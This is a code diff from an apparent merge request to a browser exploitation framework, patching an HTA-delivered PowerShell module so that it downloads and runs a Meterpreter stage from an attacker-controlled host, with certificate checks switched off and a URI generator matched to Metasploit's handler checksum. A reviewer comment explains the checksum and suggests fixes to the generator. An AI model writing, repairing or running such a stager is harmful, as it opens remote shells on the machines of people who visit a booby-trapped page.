Merge pull request #1 from ReliaQuest-Labs/hta_patch

Fixed hta_powershell module so that it can establish a meterpreter session.
This commit is contained in:
Jonathan Echavarria
2015-06-12 15:40:56 -04:00
2 changed files with 31 additions and 5 deletions


@@ -400,13 +400,39 @@ function Invoke-ps
{
$SSL = 's'
# Accept invalid certificates
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
}
}
# Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
$Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
Write-Verbose "Requesting meterpreter payload from $Request"
# Meterpreter to initiate stage 0.
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
$x = ""
function sum($v){
return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)
}
function RandomChars{
$f = "";1..3 | foreach-object {$f+= $chars[(Get-Random -maximum $chars.Length)]};
return $f;
}
function RandomArray { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function Generate{
for ($i=0; $i -lt 64; $i++){
$h = RandomChars;$k = $d | RandomArray;
foreach ($l in $k){
$s = $h + $l; if (sum($s)){
return $s}
}
return "9vXU";
}
}
$GeneratedURI = Generate;
$Request = "http$($SSL)://$($Lhost):$($Lport)/$GeneratedURI"
Write-Verbose "Requesting meterpreter payload from $Request"
$Uri = New-Object Uri($Request)
$WebClient = New-Object System.Net.WebClient
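Review bot: The `return "9vXU";` that follows the `foreach` closing brace is still inside the `for` body of `Generate`, so the function gives up after a single `RandomChars` attempt and the 64-iteration retry loop never actually retries. `$d`, which is piped into `RandomArray` to build `$k`, is not assigned anywhere in this hunk; if it is undefined at this point in Invoke-ps, `$k` is empty, the inner loop never runs, and every call returns the fixed `9vXU` — which still sums to 92 mod 256 (57+118+88+85), so sessions work but the URI is not randomized at all. Move the fallback out of the loop by placing `return "9vXU";` after the `for` block's closing brace rather than before it, and check where `$d` is meant to be populated. The magic number also deserves a comment, e.g. `# 92 is the 8-bit URI checksum the reverse_http handler expects for a new session — confirm against the Metasploit URI checksum constants`. Invoke-ps begins before this hunk.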


@@ -6,7 +6,7 @@
beef.execute(function () {
var hta_url = '<%= @ps_url %>' + '/hta';
var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
if (beef.browser.isIE()) {
// application='yes' is IE-only and needed to load the HTA into an IFrame.